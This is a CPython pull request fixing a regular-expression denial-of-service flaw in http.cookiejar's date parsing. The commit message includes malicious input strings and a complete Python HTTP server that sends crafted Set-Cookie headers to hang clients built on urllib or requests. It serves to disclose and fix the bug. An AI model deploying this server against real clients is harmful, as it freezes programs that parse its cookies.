bpo-38804: Fix REDoS in http.cookiejar #17157

Merged: 6 commits, Nov 22, 2019

Commits on Nov 14, 2019

  1. bpo-38804: Fix REDoS in http.cookiejar

    The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
    expression denial of service (REDoS).
    LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
    to parse Set-Cookie headers returned by a server.
    Processing a response from a malicious HTTP server can lead to extreme
    CPU usage, blocking execution for a long time.
    
    The regex contained multiple overlapping \s* capture groups.
    Ignoring the ?-optional capture groups, the regex could be simplified to
    
        \d+-\w+-\d+(\s*\s*\s*)$
    
    Therefore, a long sequence of spaces can trigger bad performance.
    
    Matching a malicious string such as
    
        LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
    
    caused catastrophic backtracking.
    
    The fix removes ambiguity about which \s* should match a particular
    space.
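
The effect of the overlapping groups can be sketched with the simplified pattern quoted above. This is only an illustration: `AMBIGUOUS` is the simplified form from this message, not the full LOOSE_HTTP_DATE_RE, and `UNAMBIGUOUS` is a hypothetical single-`\s*` variant chosen for comparison, not the actual patch. The helper name `time_match` is also an assumption.

```python
import re
import time

# Simplified pattern from the commit message: three adjacent \s* terms,
# so every space can be claimed by any of the three.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*\s*\s*)$")

# Hypothetical comparison pattern (NOT the actual fix): a single \s*,
# so each space has exactly one way to match.
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")


def time_match(pattern, n_spaces):
    """Match the malicious string shape and return (result, seconds)."""
    text = "1-c-1" + " " * n_spaces + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


# Keep n small: the ambiguous pattern's running time grows much faster
# than the input length, so large values may take a very long time.
for n in (50, 100, 200):
    _, slow = time_match(AMBIGUOUS, n)
    _, fast = time_match(UNAMBIGUOUS, n)
    print(f"n={n:4d}  ambiguous={slow:.4f}s  unambiguous={fast:.6f}s")
```

Both patterns reject the input because of the trailing "!"; the difference is only in how many ways the engine tries to split the spaces before giving up.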
    
    A malicious server can respond with crafted Set-Cookie headers to
    attack any Python program that accesses it, e.g.
    
        from http.server import BaseHTTPRequestHandler, HTTPServer
    
        def make_set_cookie_value(n_spaces):
            spaces = " " * n_spaces
            expiry = f"1-c-1{spaces}!"
            return f"b;Expires={expiry}"
    
        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                self.log_request(204)
                self.send_response_only(204)  # Don't bother sending Server and Date
                n_spaces = (
                    int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                    if len(self.path) > 1 else
                    65506  # Max header line length 65536
                )
                value = make_set_cookie_value(n_spaces)
                for i in range(99):  # Not necessary, but we can have up to 100 header lines
                    self.send_header("Set-Cookie", value)
                self.end_headers()
    
        if __name__ == "__main__":
            HTTPServer(("", 44020), Handler).serve_forever()
    
    This server returns 99 Set-Cookie headers. Each has 65506 spaces.
    With this input, extracting the cookies will effectively never complete.
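
The figure of 65506 spaces follows from the 65536 line limit mentioned in the server code. A small worked check, assuming each header goes on the wire as `Set-Cookie: <value>\r\n` (the helper `header_line_length` and the constant `MAX_LINE` are names introduced here for illustration):

```python
def make_set_cookie_value(n_spaces):
    # Same payload shape as the example server above.
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"


def header_line_length(n_spaces):
    """Length in bytes of one Set-Cookie header line, including CRLF."""
    line = f"Set-Cookie: {make_set_cookie_value(n_spaces)}\r\n"
    return len(line.encode("latin-1"))


MAX_LINE = 65536  # limit quoted in the server example's comment

fixed_overhead = header_line_length(0)   # everything except the spaces
max_spaces = MAX_LINE - fixed_overhead   # spaces that still fit on one line

print(fixed_overhead)  # 30
print(max_spaces)      # 65506
```

The 30 bytes of overhead are the header name and separator (12), `b;Expires=` (10), `1-c-1` (5), the trailing `!` (1), and CRLF (2).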
    
    Vulnerable client using the example at the bottom of
    https://docs.python.org/3/library/http.cookiejar.html :
    
        import http.cookiejar, urllib.request
        cj = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        r = opener.open("http://localhost:44020/")
    
    The popular requests library was also vulnerable without any additional
    options (as it uses http.cookiejar by default):
    
        import requests
        requests.get("http://localhost:44020/")
    bcaller committed Nov 14, 2019

Commits on Nov 15, 2019

  1. Regression test for http.cookiejar REDoS

    If we regress, this test will take a very long time.
    bcaller committed Nov 15, 2019
  2. Improve performance of http.cookiejar.ISO_DATE_RE

    A string like
    
    "444444" + (" " * 2000) + "A"
    
    could cause poor performance due to the two overlapping \s* groups,
    although this is less serious than the REDoS in LOOSE_HTTP_DATE_RE.
    bcaller committed Nov 15, 2019
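
A regression check along the lines of the two commits above might look like the following sketch. It is not the test added in this PR. It assumes the module-level helpers `http2time` and `iso2time` in `http.cookiejar` (undocumented, but importable) are the entry points that apply LOOSE_HTTP_DATE_RE and ISO_DATE_RE, and it reuses the input shapes quoted in the commit messages. `timed_parse` and `check` are hypothetical names.

```python
import time
from http.cookiejar import http2time, iso2time


def timed_parse(parse, text):
    """Run one parser on one input and return (result, seconds)."""
    start = time.perf_counter()
    result = parse(text)
    return result, time.perf_counter() - start


def check(n_spaces=2000):
    """Feed the problematic input shapes to both date parsers.

    On a patched interpreter both calls should return quickly; on an
    unpatched one the first call may take a very long time.
    """
    cases = [
        (http2time, "1-c-1" + " " * n_spaces + "!"),
        (iso2time, "444444" + " " * n_spaces + "A"),
    ]
    timings = {}
    for parse, text in cases:
        result, elapsed = timed_parse(parse, text)
        # Neither string is a valid date, so both parsers return None.
        assert result is None
        timings[parse.__name__] = elapsed
    return timings


if __name__ == "__main__":
    for name, seconds in check().items():
        print(f"{name}: {seconds:.4f}s")
```

The sketch reports timings rather than asserting a threshold, since a fixed time limit would depend on the machine running it.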

Commits on Nov 16, 2019

  1. Update News / Acks

    Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
    bcaller and serhiy-storchaka committed Nov 16, 2019